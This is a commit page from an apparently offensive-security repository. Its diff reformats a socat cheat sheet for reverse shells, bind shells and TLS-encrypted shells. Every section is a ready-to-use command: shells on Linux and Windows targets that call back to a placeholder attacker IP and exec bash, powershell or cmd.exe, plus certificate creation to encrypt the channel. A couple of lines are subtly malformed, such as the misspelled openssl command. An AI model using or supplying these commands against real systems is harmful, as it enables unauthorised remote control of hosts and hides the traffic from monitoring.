whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

cleanup

This commit is contained in:
gurkenhabicht 2026-05-26 22:15:27 +02:00
parent d61022f4b3
commit 71b1322381
1 changed files with 62 additions and 16 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

78
Reverse Shells/socat.md
View File

@ -1,54 +1,100 @@
# socat cheat sheet # socat cheat sheet
## Reverse Shell ## Reverse Shell
### reverse shell listener ### reverse shell listener
```socat tcp-l:<port> -```
```socat TCP-L:<PORT> file:`tty`,raw,echo=0``` ```sh
socat tcp-l:<port> -
```
```sh
socat TCP-L:<PORT> file:`tty`,raw,echo=0
```
### windows target ### windows target
```sh ```sh
socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:powershell.exe,pipes socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:powershell.exe,pipes
``` ```
### linux target ### linux target
```sh ```sh
socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:"bash -li",pty,stderr,sigint,setsid,sane socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:"bash -li",pty,stderr,sigint,setsid,sane
``` ```
## Bind Shell ## Bind Shell
### generic connect ### generic connect
```socat TCP:<TARGET-IP>:<TARGET-PORT> -```
```sh
socat TCP:<TARGET-IP>:<TARGET-PORT> -
```
### windows target listener ### windows target listener
```socat TCP-L:<PORT> EXEC:powershell.exe,pipes```
```sh
socat TCP-L:<PORT> EXEC:powershell.exe,pipes
```
### linux target listener ### linux target listener
```socat TCP-L:<PORT> EXEC:"bash -li"
```sh
socat TCP-L:<PORT> EXEC:"bash -li"
```
## Connect from statically compiled socat to LHOST ## Connect from statically compiled socat to LHOST
Binary is inside this dir Binary is inside this dir
```socat TCP:<ATTACKER-IP>:<ATTACKER-PORT> EXEC:"bash -li",pty,stderr,sigint,setsid,sane``` ```sh
socat TCP:<ATTACKER-IP>:<ATTACKER-PORT> EXEC:"bash -li",pty,stderr,sigint,setsid,sane
```
## Encrypted Shell ## Encrypted Shell
### create key + cert ### create key + cert
```openssll req --newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt```
```sh
openssll req --newkey rsa:2048 -nodes -keyout shell.key -x509 -days 365 -out shell.crt
```
### create pem file ### create pem file
```cat shell.key shell.crt > shell.pem```
```sh
cat shell.key shell.crt > shell.pem
```
### reverse shell listener ### reverse shell listener
```socat openssl-listen:<port>,cert=shell.pem,verify=0 -```
```socat openssl-listen:<port>,cert=shell.pem,verify=0 file:`tty`,raw,echo=0``` ```sh
socat openssl-listen:<port>,cert=shell.pem,verify=0 -
```
```sh
socat openssl-listen:<port>,cert=shell.pem,verify=0 file:`tty`,raw,echo=0
```
### connecting shell on target to listener ### connecting shell on target to listener
```socat openssl:<attacker-ip>:<attacker-port>,verify=0 exec:/bin/bash```
```socat openssl:<attacker-ip>:<attacker-port>,verify=0 exec:"bash -li",pty,stderr,sigint,setsid,sane``` ```sh
socat openssl:<attacker-ip>:<attacker-port>,verify=0 exec:/bin/bash
```
```sh
socat openssl:<attacker-ip>:<attacker-port>,verify=0 exec:"bash -li",pty,stderr,sigint,setsid,sane
```
### encrypted bind shell on windows listening ### encrypted bind shell on windows listening
* target
```socat openssl-listen:<local-ip>:<local-port>,verify=0 exec:cmd.exe,pipes``` Target:
```sh
socat openssl-listen:<local-ip>:<local-port>,verify=0 exec:cmd.exe,pipes
```
### encrypted bind shell attacker connecting ### encrypted bind shell attacker connecting
```socat openssl:<port>,cert=shell.pem,verify=0 -```
```sh
socat openssl:<port>,cert=shell.pem,verify=0 -
```